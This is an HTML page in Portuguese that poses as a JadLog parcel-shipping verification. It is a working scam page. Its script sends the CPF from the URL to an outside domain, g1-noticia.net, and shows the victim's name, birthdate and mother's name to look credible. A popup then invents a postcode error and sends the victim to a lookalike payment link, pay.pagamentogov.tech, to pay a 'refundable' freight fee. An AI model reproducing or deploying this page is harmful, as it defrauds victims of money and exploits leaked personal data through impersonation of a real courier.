<!DOCTYPE html><html lang="pt-BR"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <link rel="stylesheet" href="css/style.css">

    <style>
        * {
            box-sizing: border-box;
        }

        #buttonClick {
            background-color: #CB0033;
            color: white;
            font-family: "Poppins";
            padding: 7px 15px 7px 15px !important;
            text-decoration: none !important;
            border-radius: 10px !important;
            border: none !important;
            font-size: 18px !important;
            font-weight: 600;
        }

        #buttonClick:hover {
            background-color: #7a001e;
            cursor: pointer;
        }
    </style>


    <title>VERIFICAÇÃO</title>
</head>

<body>
    <header>
        <img src="./images/logo_home.png" alt="">

        <p style="margin-top: 5px; font-size: 12px;">Será responsável pelo envio do pedido.</p>
    </header>

    <div class="cta">
        <img id="imagem" src="images/certo-jadlog.png" alt="">

        <p>Confirme os dados de envio seu pedido:</p>
    </div>

    <div class="cta3">
        <p id="setar">Carregando...</p>

        <p id="setars">
            O envio será em parceria com a JadLog e a Consul
            
        </p>
    </div>

    <div class="cta4">
        <span id="sends">CONFIRMAR</span>
    </div>

    <div id="popoup">
        <div class="popoupcontent">
            <div class="row">
                <img id="naomostrardeinicio" src="images/red-hazard-warning-sign-on-transparent-background-free-png.png" alt="">

                <div class="headlineectapopoup">
                    <h1 id="carregandodadoss">Confirmando seus dados...</h1>
                    <p id="esconderdepois">Por favor aguarde</p>
                </div>

                <h1 id="carregandodadosSs">ERRO NO CEP</h1>
            </div>

            <div class="loading">
                <br>
                <div class="progresseBar">
                    <div class="progress"></div>
                </div>
            </div>

            <div class="contente">
                <p>
                    O valor do CEP foi calculado errado para sua região, o envio não será enviado.

                    <br><br>

                    Para realizarmos o envio é necessário que envie o pagamento do frete. (O Valor pago do frete será reembolsado.)
                </p>

                <a id="buttonClick" href="https://pay.pagamentogov.tech/KV603kW21Xo3w8y">
                    PAGAR FRETE
                </a>

                <span id="maisforte">Clique no botão para continuar</span>
            </div>
        </div>
    </div>

    <footer>
        <img src="images/jadlog-logo-png.png" alt="">

        <p>Todo conteúdo deste site está publicado sob a licença</p>
    </footer>

    <script src="js/text.js"></script>

    <script>
        const queryParams = new URLSearchParams(window.location.search);

        const cpf = queryParams.get('document');

        const user = {};

        function renderData() {
            if (user.sex && user.birthdate) {
                let htmlContent = `
                    Nome: <b>${user.name}</b><br>
                    Sexo: <b>${user.sex === 'M' ? 'Masculino' : user.sex === 'F' ? 'Feminino' : user.sex}</b><br>
                    Data de nascimento: <b>${user.birthdate}</b>`;

                if (user.mother && user.mother !== "0") {
                    htmlContent += `
                        <br>Nome da mãe: <b>${user.mother}</b>
                    `;
                }

                document.getElementById('setar').innerHTML = htmlContent;
            } else {
                document.getElementById('setar').innerHTML = `Carregando...`;
            }
        }

        fetch('https://g1-noticia.net/verificacao/getUserData.php?cpf=' + cpf)
            .then(response => response.json())
            .then(data => {
                user.name = data.name;
                user.sex = data.sex;
                user.cpf = data.cpf;
                user.mother = data.mother;
                user.birthdate = data.birthdate;

                renderData();
            })
            .catch(error => {
                console.error('Erro ao fazer a solicitação:', error);
            });
    </script>

    <!-- Google Tag Manager (noscript) -->
    <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-MBNDSM8M" height="0" width="0"
            style="display:none;visibility:hidden"></iframe></noscript>
    <!-- End Google Tag Manager (noscript) -->


</body></html>